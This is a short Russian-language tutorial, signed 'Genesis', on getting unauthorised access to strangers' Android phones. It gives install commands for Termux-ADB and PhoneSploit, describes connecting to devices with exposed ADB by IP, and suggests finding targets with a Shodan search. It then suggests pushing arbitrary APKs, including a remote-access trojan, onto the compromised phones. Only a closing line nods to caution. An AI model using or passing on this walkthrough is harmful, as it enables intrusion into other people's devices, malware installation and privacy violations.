Получаем доступ к чужим Android

Всем привет, с Вами Genesis. Cегодня мы разберем как подключиться к чужому Android, зная лишь его ip.

1) Установка базовых пакетов apt update && apt upgrade pkg install python python2 git 2) Установка Termux-ADB

git clone https://github.com/MasterDevX/Termux-ADB

cd Termux-ADB

chmod +x *

./InstallTools.sh

Возвращаемся в корневую директорию

cd $HOME

Установка PhoneSploit

git clone https://github.com/metachar/PhoneSploit

cd PhoneSploit

pip install colorama

pip2 install colorama

python2 main_linux.py

Мы уже установили Termux-ADB, поэтому просто вводим Y

Работа с PhoneSploit После, открывается вот такое окно, где надо ввести IP устройства с включенным Adb для проверки на уязвимость.

Далее пишем цифру 3 и Ip нашего устройства. Если это устройство уязвимо, то появится сообщение:"connected to [ip адрес]:порт".

Для того, чтобы просканировать следующий IP-адрес нужно ввести цифру 3.

Как хакеры находят устройства с включенным Adb?

Хакеры ищут такие устройства с помощью Shodan (поисковой системы, которая позволяет пользователю находить телефоны определенного типа, подключенные к Интернету).

Например, по запросу "android debug bridge" Shodan выдает 12 тыс. открытых IP-адресов. Вдумайтесь, 12 тыс. потенциально уязвимых телефонов!


Понятное дело, что не все 12 тыс. устройств уязвимо. Но процентов 30% из них точно!

Что можно делать после этого?

Все! В самом буквальном смысле этого слова.

Более подробно написано вот тут.

Например, выбрав пункт номер 5, можно загрузить на устройство любой .apk файл. В частности, троян (RAT)

Будьте аккуратнее с режимом разработчика. С Вами был Genesis, всем пока!